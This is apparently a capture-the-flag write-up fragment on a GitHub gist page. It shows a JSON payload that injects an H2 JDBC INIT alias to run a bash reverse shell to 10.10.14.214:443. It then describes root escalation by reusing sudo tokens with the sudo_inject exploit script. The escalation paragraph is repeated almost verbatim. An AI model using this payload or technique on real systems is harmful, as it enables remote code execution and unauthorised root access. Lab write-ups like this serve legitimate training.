You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('sh -i >& /dev/tcp/10.10.14.214/443 0>&1');"},"name":"x","engine":"postgres"}}
```
For privilege escalation, I noticed the routine of "expect" and "sudo" in it. However, I could not find a keyword to a valid PE path. After hours of wandering around, I started to check each result of linpeas.sh from the top down. Googling this "ptrace protection is disabled (0), so sudo tokens could be abused" line leads me to this [sudo_inject GitHub page](https://github.com/nongiach/sudo_inject). The Hacktricks page of [reusing-sudo-tokens](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens) is also helpful. I used exploit_v2.sh in the sudo inject GitHub page to get a root shell.
For privilege escalation, I noticed the routine of "expect" and "sudo" from the root user. However, I could not find a keyword to a valid PE path. After hours of wandering around, I started to check each result of linpeas.sh from the top down. Googling this "ptrace protection is disabled (0), so sudo tokens could be abused" line leads me to this [sudo_inject GitHub page](https://github.com/nongiach/sudo_inject). The Hacktricks page of [reusing-sudo-tokens](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens) is also helpful. I used exploit_v2.sh in the sudo inject GitHub page to get a root shell.
